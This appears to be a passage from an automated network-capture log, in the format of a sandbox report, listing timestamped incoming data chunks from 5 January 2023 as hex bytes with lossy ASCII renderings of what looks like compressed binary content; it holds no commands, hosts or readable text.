                                                                                                                                                                                    2023-01-05 07:58:10 UTC2017INData Raw: f3 d4 ab a5 4a e9 dd eb 2b 51 a5 57 db 6e d5 02 e2 7a 14 d2 7b b6 f5 b6 a8 ab 75 ce a7 ad df cf af 1a f5 6a 25 7d 7e f6 d6 d8 af 5a ca a9 66 b6 a6 be b4 ab aa eb 11 6d bb b3 fb 1f 7f 49 f4 6e ee 29 7d 5d 8b bb 2b 36 57 a1 ac 6a 55 eb b6 0d 04 bf a1 b3 7b 45 3a ab 74 36 3d 97 62 db 5e 9d 8b bf 8f 7f b0 f5 a9 bd df 59 7f 2e bf d7 2d d4 ec bb 0e b5 b4 ac de bc 69 d7 ec bb 1a 1d b1 d5 7b 35 69 dc ec db 6f 42 8e e2 aa db 7a d4 da 1b da f7 ad 77 69 76 5c 6e eb bb 1e c2 7a a7 5b a2 c3 b3 f5 fa b4 35 51 76 37 cd ba d6 0b 75 7d 5f 64 d7 45 14 55 77 63 4e a1 a5 74 a9 d1 5d 5d ea 76 4f 71 b9 a9 4d db dd 9e e7 d5 d3 6e 6d 6b 6d 2f b7 db 5c b3 bc b7 5e b7 eb c0 a0 ab 29 dc 01 c7 43 a0 fb fb 56 fa f6 e7 3d e5 64 3a 97 8a ac 2f b1 75 5a 68 4b 75 3e af 5b 6b 51 dd f5 fd
                                                                                                                                                                                    Data Ascii: J+QWnz{uj%}~ZfmIn)}]+6WjU{E:t6=b^Y.-i{5ioBzwiv\nz[5Qv7u}_dEUwcNt]]vOqMnmkm/\^)CV=d:/uZhKu>[kQ
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2024INData Raw: 8d 09 d6 f6 d7 25 37 f7 97 f0 f5 6e d7 76 db 7b ae eb b1 d6 dc 4e ff 00 77 a8 d0 e9 bd 54 76 03 bb 6a 5d fa 4a c6 d6 bb fb 15 a3 6e cd fe 6e 9a 03 65 35 f6 f6 a8 3b 9e c3 b3 b3 bb a9 56 c6 b3 75 ba 4b b3 b3 da 77 bb 1a d2 83 b3 d9 0f 63 ea 3b 8d 8b 7b 6e c6 cf e1 7f b7 dc d8 ea b7 49 dc ab 4f 61 35 12 ed 1a 28 ed bd 8b 62 e2 fd 85 35 68 cd 6f b7 5a cd 8a 9e cb 75 36 96 97 ea bb 7f a4 f5 e1 3b 3b 7a dd 02 7b 3f ec 2b 2e b3 b2 ab 88 5d 0e ce dd 3b ef d8 3b 67 5f 59 9d bb eb 2c d7 ae fd 84 b6 ba 35 aa b6 d4 a2 b0 ef 66 08 d7 bd d4 6b 87 16 6b eb 09 55 b6 a5 75 7a cb 6c d9 bf d5 7d 14 d9 45 94 cb 6d 17 45 a8 e1 c1 21 3f 7c 65 e3 10 aa a6 a6 a5 36 87 dd b2 93 b1 bb 4f 27 ad 16 56 ef 5d bb 1a ad b1 51 e4 25 6c 15 b6 2d 0e c7 31 2d 28 a4 93 02 00 34 95 4d a0 71
                                                                                                                                                                                    Data Ascii: %7nv{NwTvj]Jnne5;VuKwc;{nIOa5(b5hoZu6;;z{?+.];;g_Y,5fkkUuzl}EmE!?|e6O'V]Q%l-1-(4Mq
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2040INData Raw: 60 ed eb d0 bf 7d ba 5d 85 fd 75 7b be c3 f7 1a ac b7 76 cd dd 1b 29 da 5b f5 f5 ef ea ec ad 2e 4d 5b 06 df 67 d3 7d 5b 1b 2b b1 56 b5 a1 81 1b 57 7a d6 98 dc fe 6c a2 d5 b1 fb 4d 2a f6 68 d5 ad 83 78 47 6d db 2c 36 da 6b 3e af d1 eb ef 5f ed 9d d5 3d b6 e6 9e 87 d5 4e e6 da 98 58 b4 d3 ed ab 4d 3a 2d 65 b3 76 8b 42 eb ff 00 1b 4e 96 75 de b2 dd 6d ce cd 76 3a 3d be 93 5e fe c6 db b5 3a fd f1 af aa c6 cd 5a f5 36 ef 27 60 3e b3 58 ad 64 a0 a8 41 d5 6e 6e ce b3 b6 dc d0 47 dd bb 56 9e cd d9 05 7b 14 99 d7 75 f6 d5 55 5a 54 53 46 c2 75 ed b5 da 77 fa 5d 86 de da d7 68 ab 4d 0b 6b 53 79 9f 62 86 dc d6 46 b4 d6 56 06 0c 34 5c ed 6e 77 2e df cd ac 29 5b 50 d6 7b 26 e7 48 19 99 9f e6 ba 93 36 1a ea 97 5a 04 0b 98 ac 54 17 f2 6f 19 a6 dc 46 7c 42 d1 b9 3b 3a f0
                                                                                                                                                                                    Data Ascii: `}]u{v)[.M[g}[+VWzlM*hxGm,6k>_=NXM:-evBNumv:=^:Z6'`>XdAnnGV{uUZTSFuw]hMkSybFV4\nw.)[P{&H6ZToF|B;:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2056INData Raw: 9e bb a3 d6 f5 2e a7 6f b4 d7 f4 4d f3 d7 76 7e f3 42 74 bd 95 bb 2e 96 ae ef 65 7b f5 c6 fe cf ab dc eb fa ff 00 5e ab a7 f5 9d 8e ed 77 3a 9d be a2 fd bd 3f a4 ec d6 e2 b6 e6 b0 62 0a 89 9d 1f 52 36 06 e1 e7 79 5c 84 50 09 e2 65 74 b5 cd b1 60 b1 a3 21 0c cb c5 7a 3d ce 62 a4 e5 67 72 a8 d7 eb b0 d2 a5 b6 2c 4b 2a ec ad de a3 73 ae 15 1e c6 ca 89 ac e2 25 16 58 d6 af 08 44 c4 d2 da 7d 3b b6 fd 87 6b 70 75 7d 03 9d 7e db 41 34 f5 fb 0b 53 70 7e ea 8d f7 b3 4b 6d 25 43 18 0c e3 98 c2 03 2a 62 ac ea 4b 21 e2 52 96 c2 ab 29 fa 16 63 33 a7 d8 a9 6c 5e b2 ab 7b 1f 4f f6 1b bd 5f b7 d9 df 7d 8d 9e 8b d7 6e ec 76 28 fe c4 7e a7 5f 5d c6 c0 ff 00 44 a6 97 4c 37 d2 d1 6e e6 8e 17 1d 1f 6d 56 b5 ba 9b 9b 34 e9 d5 ee 3d 8e e5 76 75 bf c5 a6 d6 b7 5b 61 75 29 9e db
                                                                                                                                                                                    Data Ascii: .oMv~Bt.e{^w:?bR6y\Pet`!z=bgr,K*s%XD};kpu}~A4Sp~Km%C*bK!R)c3l^{O_}nv(~_]DL7nmV4=vu[au)
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2064INData Raw: 60 61 c1 85 01 5e 30 64 4c b0 85 89 9c 89 3c b2 3c 4c 02 55 01 2c 9e 48 e2 49 80 80 01 19 c7 9e 58 9a 57 58 2e be a7 ed 57 b5 d5 3a b1 1d 54 b6 c1 c3 39 61 d0 fb 1b f5 16 9e b1 fb ba b7 bd 7d f4 c7 79 5e a6 c0 ed fb 7b f1 fc fb b7 13 53 4d f7 36 f7 3a f7 78 fa ee 81 78 b0 6a fc 6a f3 07 b3 ad aa 39 24 ea a2 d6 fa 68 81 b7 95 4a 8e c6 e4 96 76 17 ef 59 6d 77 ea c5 b6 76 db 15 6c a7 f3 75 cb ed 38 ad 77 f4 91 ed db e8 ef d4 aa 9a 6d a7 4a eb 9f 56 9e 37 67 a8 e8 3b 0d 8d 0a fd 9f 6e 9d 2e d7 b7 b7 6c 53 b0 6a 57 d1 b6 a7 70 08 a3 a7 7d e1 de e7 a3 f4 ab 5b 2c 57 33 86 60 58 4c c6 0a ae 62 57 93 e8 f6 27 a3 fa e6 dd e6 e6 2a 44 d5 d4 be f7 af d7 76 ab ab d7 3d 47 aa 4e a7 7f 61 28 bb b3 4a b5 35 6b ef c3 75 cf d6 11 3d 6a 91 b7 7e d6 75 f6 ed a5 50 b6 04 bb
                                                                                                                                                                                    Data Ascii: `a^0dL<<LU,HIXWX.W:T9a}y^{SM6:xxjj9$hJvYmwvlu8wmJV7g;n.lSjWp}[,W3`XLbW'*Dv=GNa(J5ku=j~uP
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2088INData Raw: 7b 43 4c 4f 65 b3 96 f7 69 5e c5 3a f7 5f 65 4d d5 9b 9f fd 1e b6 bd 7b 0d 4d 5a b4 e9 da cb 46 bb 03 66 c7 19 6e c8 36 e9 e9 59 b4 74 ad b3 a4 d8 3e cf 73 b7 b1 7b 46 98 a1 f6 5d 8f 50 fb 1b b6 9e db 63 49 bb bb 47 41 a3 fc bd 8d da d3 56 ad be bf b3 ec d3 4a 9e cc fd 6d 41 d5 2d 71 a9 a8 16 69 f2 ea c7 d0 fb 75 3f f0 be ad 71 5e db 21 6d 4e 0c 7a be 93 61 7a ce 97 46 bd 9d 57 b3 ae a1 ab af b0 de b9 7a 92 ad 5f 57 ae 9b 56 da a6 db b4 ae aa ae ca de bd ad 0c e4 7f 1a c5 d6 af 64 eb b5 9a b5 ec 2d 5a 14 d5 5b ea 13 2a d4 1d 65 ba 6c ad 45 9b 48 dd 73 56 cf 5f 5d af af af 7f 65 65 57 45 3b b6 0d ab b5 6b a3 4f 6a a6 6d de 8d 4d 43 56 dd 7a 7b 7b 6a b6 dd 1d 42 f3 7e ab 59 6e a2 a4 ab 56 ed 5a 55 e8 7a d7 72 bb 16 8a 58 32 7a cf 4b a1 dc 6d 6b eb 2f 67 4a
                                                                                                                                                                                    Data Ascii: {CLOei^:_eM{MZFfn6Yt>s{F]PcIGAVJmA-qiu?q^!mNzazFWz_WVd-Z[*elEHsV_]eeWE;kOjmMCVz{{jB~YnVZUzrX2zKmk/gJ
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2104INData Raw: 53 85 2d e1 21 7c d9 44 71 ff 00 8f 4a f7 8a 8b af 8b 3f 0e 6f 00 89 72 ff 00 92 eb be 81 17 98 64 1e e1 ad dd 1c 7b 97 49 9f bf 74 54 fe 35 f3 0c ab 76 6f 94 4b 5f 35 d6 0a a9 bc a9 f0 89 9b 6e 06 20 9c 0d 89 55 15 44 e5 cb a8 4c d9 b4 f2 ae 51 a8 f5 6e c1 95 ae e2 c7 38 e3 86 8c 6d 1c 74 dd e6 c3 23 a0 aa 22 aa 6a 1a 8d 57 51 9a ac 72 d2 07 22 8d 56 ac 08 c9 99 fa e6 18 9c 30 24 13 59 e8 5b a0 61 51 7e 2e 81 a8 f5 65 a3 8c 2d ab 59 c3 04 d1 a9 ee c0 f5 6b 78 50 64 56 71 ee df fa 88 dd bb 86 89 87 ca 40 ea 49 08 30 ab 49 24 7a b2 8f 48 a4 f0 8a 82 ff 00 a0 cb b9 c4 35 bb 95 d3 a8 57 43 32 26 f4 66 71 13 84 b6 d5 81 57 6d 15 67 f9 0d 99 7c 35 65 20 61 93 a4 44 b7 bf 58 b9 ae cd 6d dc 3e 23 2a 2e 51 d2 eb ae 4f 67 10 89 77 6e ed ac 35 a6 96 f5 09 65 da ae
                                                                                                                                                                                    Data Ascii: S-!|DqJ?ord{ItT5voK_5n UDLQn8mt#"jWQr"V0$Y[aQ~.e-YkxPdVq@I0I$zH5WC2&fqWmg|5e aDXm>#*.QOgwn5e
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2112INData Raw: d7 08 ad 3f ff 00 ae da c4 8b 97 7b da 5d 6a ad da 35 66 bb e9 f2 8e 94 64 a4 ee d1 97 e2 34 2f 9b 37 d2 35 c6 55 f8 bc 15 7f a8 59 93 77 fc 76 e6 e1 e2 f1 58 23 f6 0a b7 48 e9 47 bb 74 7e 87 6b cf c3 57 5d e7 51 3d f4 6f b2 4f 40 d8 1f 8b ea 1f f1 11 77 2d e2 b4 61 bb 0e e1 cf ca 45 51 d7 76 ec c2 2d 9d 83 a6 92 76 8e b4 43 4e d3 57 08 e9 ba 25 a8 dc de 13 4f 32 7c 22 ab e6 91 84 16 ae 9d a3 28 ca 4d 20 61 d4 9c 13 81 89 18 8a 38 c9 f7 04 8a ab b9 77 22 8a af ba 2a 77 69 19 3b 0d 5b dd 1b 2b 90 3e 17 ab 56 6a fb da b3 79 7c c3 a7 94 95 ec 19 28 f5 8a 2a b8 cb 45 6c 2e 32 7f a8 b9 53 57 08 96 dd bd f5 0e 47 ab 0b e0 7a 41 1d 7f 49 38 d8 6b 22 ed db 4c dc 58 32 8c 3e 26 5e d1 93 84 72 30 3a 26 6b ad dd b4 cb 76 fb 51 51 68 c9 a4 74 ab aa f9 0b 6d 44 cd 9f
                                                                                                                                                                                    Data Ascii: ?{]j5fd4/75UYwvX#HGt~kW]Q=oO@w-aEQv-vCNW%O2|"(M a8w"*wi;[+>Vjy|(*El.2SWGzAI8k"LX2>&^r0:&kvQQhtmD
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2144INData Raw: 2f 0f e6 a4 e9 fb a1 c8 18 7a b1 b7 af 84 74 1d 15 ad 1d bc c4 0f 57 41 d0 85 23 78 db ba 49 23 ff 00 d2 be 61 12 9d 77 48 24 45 20 d8 41 27 b2 8e a3 1b 6a c9 b6 b0 48 eb 46 51 d3 d5 e5 ab 09 48 a3 f6 8e a8 d5 8d b8 e6 a9 89 97 1c e1 71 c6 41 87 ac 52 54 eb a4 74 ec 27 b4 ed a4 d5 ba dc 3d 5b 65 5d 6a f4 9c 31 81 ea e2 e1 6c 32 33 74 0d 8d e9 29 48 c5 18 5c 71 c7 4a 4d 72 9a 92 3d e3 0d de 7b 8c cb da 39 24 12 87 b6 e1 e8 e9 83 6e 28 a3 e1 6a be 18 1f ec 0f 56 1f 9a 9a 64 8d e1 bb 47 6d dd d2 46 4d 84 51 e9 ec a2 ce 51 5b fd 6e e2 f2 d1 93 79 46 54 c0 c9 49 24 8a c9 06 d1 e8 c3 53 cc 38 e3 08 b4 db 46 ed 35 7a 7a f2 8c 95 6a 3d 15 49 62 48 27 56 08 a3 20 cb 57 e8 d8 8a 4d 22 92 31 1f dd 46 23 0c 51 9a bf fb 63 61 a8 e3 20 d4 9c 13 4d b5 9a cf 47 03 2e 07
                                                                                                                                                                                    Data Ascii: /ztWA#xI#awH$E A'jHFQHqARTt'=[e]j1l23t)H\qJMr={9$n(jVdGmFMQQ[nyFTI$S8F5zzj=IbH'V WM"1F#Qca MG.
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2160INData Raw: 77 b2 b8 69 a5 63 6d 3d b5 dc 3b ea f7 1f 5d 7b 0f 0a 00 ea 28 3a f0 35 70 2c 7b 28 9b 71 ab af 13 57 6d 0d 58 f1 f6 51 16 b1 3a d7 71 ab 8d 47 d0 2d 56 b7 d1 73 5a d6 bf 45 bf db bf fb 1e ca b7 d1 6a f6 7f f9 2b d5 ab 4a b0 1f 4f b3 e9 f6 7d 02 be ba b7 d1 af f3 50 45 6b 59 b2 04 77 f7 db b6 90 aa 5e 61 70 d6 b9 66 f2 b1 ec cb c3 4b 24 97 4b 9b 10 82 ed 97 fa 64 f7 f9 a9 97 00 ec 06 6e df 5f 00 c2 9d 76 c9 1c 52 6d e0 79 9f d4 70 2e 17 5e 46 6e 5c bd da 8a 1d 9a cb fa c7 52 26 0e 01 50 d7 e5 31 b7 62 2a f5 57 e9 26 94 91 11 26 eb e2 07 ba a5 93 6c 08 32 7c 32 5c e9 f6 e5 4d b7 92 d2 5b 4e 57 e5 f6 3f a8 34 29 4d 2c c3 1c 0e b6 d4 5b dd 6e fa f4 36 85 5e 42 a5 c5 d8 0d 3c 5c de 6a c6 42 59 87 7f 65 bb 2a e4 13 dc 05 02 b6 2c 7c 37 d4 57 ea 43 04 28 0e ac
                                                                                                                                                                                    Data Ascii: wicm=;]{(:5p,{(qWmXQ:qG-VsZEj+JO}PEkYw^apfK$Kdn_vRmyp.^Fn\R&P1b*W&&l2|2\M[NW?4)M,[n6^B<\jBYe*,|7WC(
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2168INData Raw: a0 11 b0 91 e7 ec 1d 87 8e a7 bb db 4b 0e e0 15 54 b8 55 e1 db cd 50 6d e1 0c fb 8d cb e7 60 bc 3c 08 89 e6 2d 5b 7d b3 67 16 ee d9 ca ad ca 63 b7 50 63 f7 68 cd b0 44 62 41 2d 62 18 12 a6 f7 5e 9c 9b cd 8a f3 54 ee 25 db ac a6 32 ae b2 92 0a 83 a9 68 c8 e0 f5 7b 01 6a d2 f5 61 56 fd 95 a0 d6 b8 fd 54 6d df fb 6b fb 6a e3 53 fd b5 6a f6 eb 5a fd 75 a7 0a ed bd 69 c0 d5 aa f5 a5 5e fa 77 77 9a 36 e3 57 e1 7a f6 e8 7d 95 a6 a0 d7 b6 b5 ad 7f f9 a2 2f a9 a2 3b 78 1f f7 55 bb ab f6 56 9c 07 75 7b 7b 28 81 c7 fa 6a c7 80 36 fe 42 87 f2 d6 8d fe af aa 89 ec ef ab f7 69 ad 5a af fd 35 6f e9 ee ab f6 55 8f f2 14 14 6b d9 6a bd 5f 88 e1 5a eb df 5a f1 ec d3 5a b5 10 7b 3b 28 8e 26 bb 16 df cf 56 24 5c f7 7b 68 05 00 93 c4 d6 7d 5d 95 89 1a df b4 56 2e ba 9e ed 28
                                                                                                                                                                                    Data Ascii: KTUPm`<-[}gcPchDbA-b^T%2h{jaVTmkjSjZui^ww6Wz}/;xUVu{{(j6BiZ5oUkj_ZZZ{;(&V$\{h}]V.(
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2184INData Raw: 61 4c 78 e3 44 83 7d 28 7c 81 00 12 ca 16 5d db eb 74 4e 31 ed 57 df 93 a9 e8 2a 0c 51 45 80 1c 00 1f 45 aa f5 c3 e8 d2 b5 3d 9d 95 fd b4 2b 5e 15 8f 6f 7d 77 77 56 bf 55 5f 8f d1 f5 51 ee 1f 46 b5 ad 1b 6b 5e cf a2 dd d4 2d c6 be ba b7 ed bd 77 d6 9a 77 56 a6 ac 4d bb 8d 68 d7 f6 57 56 b5 c8 41 f6 57 78 e1 a6 b5 cc 2f 40 8e da bf db 5d ff 00 d7 57 ab da be ca f6 f6 55 c6 a3 e8 bf 0a b0 fa e8 5a af dd fd 15 6e 02 af ad bb aa e4 1b 0f e8 ae 93 a7 0b 50 c8 5b be 88 b5 5e da ff 00 45 63 dc 6a fc 2a dc 2b be af 56 ad 3e 8d 3e 9d 3e 89 b7 92 23 cb e8 c6 f2 7a 71 8b b3 04 19 35 bb be b6 a0 1b 65 be 4c 9b 0b ac 5e a2 97 b6 5e 9a 98 f5 66 c7 cb 52 36 c3 7a 91 4e 63 ba ac c3 d3 75 ca e1 18 24 b6 c9 da df 0b cd 51 c1 bb 96 3d ee df 71 16 12 cb 3d b1 89 9c fa 6b 24
                                                                                                                                                                                    Data Ascii: aLxD}(|]tN1W*QEE=+^o}wwVU_QFk^-wwVMhWVAWx/@]WUZnP[^Ecj*+V>>>#zq5eL^^fR6zNcu$Q=q=k$
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2200INData Raw: f2 ae bb 89 24 65 c7 27 e7 58 d6 b6 d0 ed e1 43 28 42 f1 15 5c 9e 50 e4 95 6b 2f e6 7a 56 64 e6 19 25 10 cc 05 db 23 6e 1c 7c 34 db 7b 8f 4b 26 23 40 0f 3f 50 ef fc 35 b7 de cc 3f 57 bc da 94 55 f5 95 7d 2c 23 56 8e 38 f0 5b 33 aa e4 ae ac dc d9 75 d6 c6 2d f7 cb e0 fd 36 e8 01 ea 6d e4 3c a2 fe 9b de 33 c9 0b c6 dc ed 0b f8 3a 28 46 ec 03 1d 40 b8 d4 79 94 53 2a 6c f6 f2 ed 4a 93 8c 8e 56 41 6f 13 1b 34 63 3f 0f 96 87 cd 1f 66 61 91 c1 04 3b 67 19 25 02 aa 96 07 34 f4 e2 ea 55 ea 93 c5 e1 a9 be 75 f3 5d ca c7 f2 98 53 d4 8e 65 4b 19 3a 54 ed 60 5f ff 00 46 f8 87 0f 79 f9 ea 3d be d2 36 db 6d 5c a2 24 68 48 17 27 04 63 ae 53 48 cd fc 6a 65 dc 6c e0 86 49 b1 f4 fa dc 27 a5 f9 b0 b4 8e d9 44 fb 85 5e 56 e8 76 cd 3e 1d 09 a6 87 29 0a 4a 8c a4 92 b8 c8 2c 16
                                                                                                                                                                                    Data Ascii: $e'XC(B\Pk/zVd%#n|4{K&#@?P5?WU},#V8[3u-6m<3:(F@yS*lJVAo4c?fa;g%4Uu]SeK:T`_Fy=6m\$hH'cSHjelI'D^Vv>)J,
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2231INData Raw: a3 af ff 00 52 3e a4 ab 01 6d 3e aa 03 80 fd 9a d2 ed d7 16 7b 65 29 60 4e 00 f4 9b 72 df f9 63 50 6e f6 bb a8 24 30 13 3c 71 c4 4b a4 65 bc 2e d6 4c ee bd 4b e1 e9 a8 7f 4b b3 c6 22 87 20 1f 17 72 40 59 2c de 08 83 f8 7a a8 c6 bb 30 37 ec 0a 65 33 b1 64 cb f8 91 67 94 4e be 5e 6a 3e 86 d2 44 da a2 04 47 89 6c 39 7a 9a 66 b7 3e 54 5b 3d 0e 96 1c 6f ed a2 62 20 91 a9 ca d6 3e ca 69 1a 35 6c 49 56 20 00 4d f5 fb d5 ea 43 78 4d f4 2a 6c 4f 75 3e d7 e6 33 3a 32 29 26 d2 63 8a 28 ff 00 a9 f0 db d4 ee a1 f2 53 f3 54 de 4e d1 e3 b6 cc d9 51 87 83 38 ad 12 cb 6f 14 9c ac 94 61 00 4a ea 48 03 b8 af 11 a7 55 47 37 cc 61 44 56 65 62 c8 2f 80 07 9d b0 f7 d7 95 3c bd 54 bf f8 f2 20 db a3 16 08 0f 50 bf f1 2d d5 4f 1e e3 6b 14 c1 d3 0c 73 36 04 9d 5d 97 cf f8 a9 a4 0a
                                                                                                                                                                                    Data Ascii: R>m>{e)`NrcPn$0<qKe.LKK" r@Y,z07e3dgN^j>DGl9zf>T[=ob >i5lIV MCxM*lOu>3:2)&c(STNQ8oaJHUG7aDVeb/<T P-Oks6]
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2247INData Raw: e5 84 6f 7e 5e cd f9 b1 86 2e 40 16 be e9 e4 e5 7f 22 b7 f7 6b 6b 3c 51 34 7b 10 a6 f0 12 31 8d 98 dd fd 3c 7f 87 e2 f4 db c7 5f f9 2d 9f a1 2e cb 79 78 ff 00 4e 0e 45 02 9d 15 a4 f0 17 f1 7a 74 36 df 2f 49 67 42 f7 48 0c 8d e8 8c 7c 2c de 44 a4 f9 af cc 77 b0 23 00 11 8a c6 0a 06 1d 5b 78 62 04 b6 5e df 15 4b b4 f9 5e da f2 17 2a db 96 3e 9a ac 77 fa ba f1 e5 c2 3a 09 f3 99 27 06 56 51 ea c4 a4 ad d8 7e 5c d7 c9 bd 47 f0 b2 65 8a e1 4d ff 00 84 dc a0 dc a3 92 d0 b7 2c 8c 80 59 15 17 bd 1f 9d bf 15 41 1f cc f7 12 b2 c5 62 82 50 4d 8b 2f 32 aa b7 f0 fc 3d 5e f5 3c bf fb 76 f4 6d f7 32 4a ff 00 0b 6e 44 80 d9 57 16 f5 51 5d 79 59 b3 c3 2a 8f 6f 16 fd b7 0c a2 25 02 49 5a c4 25 cb 46 be a6 28 be b6 5f 13 1f c1 4d 12 41 b7 79 1d 02 80 8e 32 0a a0 2e 51 aa 9e
                                                                                                                                                                                    Data Ascii: o~^.@"kk<Q4{1<_-.yxNEzt6/IgBH|,Dw#[xb^K^*>w:'VQ~\GeM,YAbPM/2=^<vm2JnDWQ]yY*o%IZ%F(_MAy2.Q
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2263INData Raw: 94 0b 7c 71 50 31 f2 fb 57 9a 8a 8f 49 26 6d 79 d8 27 e0 19 f8 bd da 3b 59 23 32 15 e6 c8 1e 00 75 0b 74 db de a6 99 80 32 34 61 b5 e0 6f d4 53 dd 5f ef 35 7c 36 c6 3b 80 03 80 49 5b 73 95 1c 69 43 22 32 49 97 a6 5c 94 52 45 82 c2 98 df 9d fc 3e f5 7a 1f 30 42 10 15 c9 a1 20 b2 12 33 c7 9f 93 2f bd 52 bb c7 e9 a2 b0 25 94 7c 46 4e 9c 25 37 f4 ac 7a fa 7a e9 60 f9 46 d2 1b 08 83 04 8d 9d dd 71 37 6d d4 a5 b9 73 f0 b2 bf 25 6d f7 7b ed e6 d6 3d db aa b1 8e 18 f0 92 cc 2e 25 64 b2 ac 99 0f 15 2e c3 e6 32 c5 b4 fd 6a 0f 4b 72 ef 9a 86 6f 16 31 f4 e5 d3 5b 2d e3 85 f4 f6 b1 a4 01 ae 4c 32 08 8f 3b 2d b9 93 d4 f7 a9 f7 1f 30 cd a7 7c 2c db 71 87 a7 77 e5 7d d2 db e1 7c 33 c9 46 f6 1b 54 32 32 82 d7 2c ab d4 a5 bc cf e6 a4 82 18 9a 59 9d ce 6e d7 5f 4d 2f f9 45
                                                                                                                                                                                    Data Ascii: |qP1WI&my';Y#2ut24aoS_5|6;I[siC"2I\RE>z0B 3/R%|FN%7zz`Fq7ms%m{=.%d.2jKro1[-L2;-0|,qw}|3FT22,Yn_M/E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2266INData Raw: a4 25 c1 ec f3 7e 1a 10 0d ad a5 90 8c 1d 41 62 48 ff 00 4f c4 bc bf bd 52 6c b7 e9 e9 ac 44 73 32 15 6b 5f c8 d8 fe c3 42 7b 2f ea 1f 20 39 41 61 e5 66 ec d7 fb b4 f1 14 69 25 90 10 d6 03 87 dd 51 7a f4 b7 e5 b7 11 95 37 31 12 a7 2f e1 ab 3b 2f 2a df a9 2d 43 6f b5 db 41 33 bc 40 09 5b 27 74 63 d4 d9 35 95 5d 7a 7a 7a 69 a4 31 34 9b d5 8f 01 a2 c7 11 51 a2 c6 17 57 96 fd 79 8c 1f de a4 63 13 4d b7 88 28 36 25 39 17 f8 57 5f 2f ef 50 5f 9b 99 9b 6e 10 a2 2a 48 a3 d3 bf 36 0e d6 e6 45 4e 9f 13 3d 46 59 d6 11 b6 89 23 1b 68 c9 c2 44 2c 4f e9 a7 4c 91 f2 f1 4a 89 92 3a b5 7a 5f 2e 8e 3c a6 73 20 75 90 b2 a8 e9 58 59 5d 5b 10 9f e9 d7 eb 77 91 ac f2 06 7d 0b 92 35 f7 7b 92 8b 6d da 5c a3 6e 80 08 52 09 fc 5c f9 e3 cc c9 8d 49 38 95 e3 cc 15 19 1b dc 5e f8 b7
                                                                                                                                                                                    Data Ascii: %~AbHORlDs2k_B{/ 9Aafi%Qz71/;/*-CoA3@['tc5]zzzi14QWycM(6%9W_/P_n*H6EN=FY#hD,OLJ:z_.<s uXY][w}5{m\nR\I8^
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2282INData Raw: 0f 4c 76 f1 32 ae 35 36 ca 5d c3 47 f2 e9 1d 65 9a 44 b1 77 5e b0 89 c0 7a 9c de 2e 4c aa 5d 9f c9 36 b1 6c be 5f 65 b2 65 97 aa 41 e4 79 25 4e 67 97 c5 22 74 ad 7e ab 72 c4 4b 22 d8 c8 c4 89 00 36 ca 36 b7 57 96 3f 72 91 56 18 d5 55 82 46 91 a8 01 40 21 f4 6f 0b 7a 8b 93 3f 8a 86 68 a9 b7 8d d9 97 3e 05 97 27 65 1f cb f2 ea 6f 99 7c c1 94 4c 65 f4 db 00 34 2a a2 4c 21 b7 2e 2d 7a 69 54 98 a6 72 15 6c bc d8 1e ac ce 8b 82 7e f5 34 91 ba ee 90 23 2c 91 1b c7 8e 7a 37 a7 7e 65 73 82 f3 2f 55 42 df 2c 79 26 32 22 2b a0 22 26 32 01 94 aa be 54 0f cd fb d5 91 58 a5 42 6c 43 83 a5 bc af c7 f7 68 cf 01 3e 9c 88 43 a5 bc 2d cc 57 9b 8f 9a 82 47 1e 32 90 2e cc 49 37 14 25 58 fe 20 1d f6 d6 c4 66 bd d4 3f 59 98 c8 15 f5 03 e2 46 97 e6 d1 cb ad 26 d6 c0 99 8a 95 0b
                                                                                                                                                                                    Data Ascii: Lv256]GeDw^z.L]6l_eeAy%Ng"t~rK"66W?rVUF@!oz?h>'eo|Le4*L!.-ziTrl~4#,z7~es/UB,y&2"+"&2TXBlCh>C-WG2.I7%X f?YF&
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2298INData Raw: 29 f1 ad 04 3b 8f 54 83 ad b4 02 dc 02 d0 8d 21 0a e6 f9 35 ec 7f 0f 97 ed a5 8b 78 44 d1 ea 41 50 01 04 f7 9a 93 6d 08 bc 72 42 61 30 dc 7e 59 3e a4 88 b2 7e 1e ae aa 61 30 3b 70 85 8a 9e d0 de 10 de ed 31 d0 23 6b 7e 1f b2 84 b3 d8 10 88 80 5b 4c 50 63 1a af d9 5a 8b fb 3e ba 39 9e ca 17 ed e1 47 4d 69 54 00 15 2f 6d 39 b5 e3 91 a5 f5 58 2a 33 58 93 c0 0e fa 90 cb 3a a4 4a ac c1 ed c4 8d 11 4a 8e d7 ec 5a 33 45 63 12 b9 57 63 65 1c a0 c9 d4 de e8 a7 fd 28 3e 91 b5 af c7 86 bf de ae eb 51 62 7a c5 b4 fe 5c 6b 56 0a 3f a6 b1 03 40 74 fa a8 2e f9 a4 58 8d f5 8c 06 60 6d c9 ca dd 5c dd 55 36 d7 d7 f4 62 99 32 91 09 00 49 e9 fc 44 56 f5 39 72 57 1d 34 c5 d6 c5 94 a9 bf 68 6f 61 e9 a0 92 0b aa 5e cb 7b 58 9a 22 37 b0 60 6e 3b e9 23 44 67 76 d1 55 41 24 fd d5
                                                                                                                                                                                    Data Ascii: );T!5xDAPmrBa0~Y>~a0;p1#k~[LPcZ>9GMiT/m9X*3X:JJZ3EcWce(>Qbz\kV?@t.X`m\U6b2IDV9rW4hoa^{X"7`n;#DgvUA$
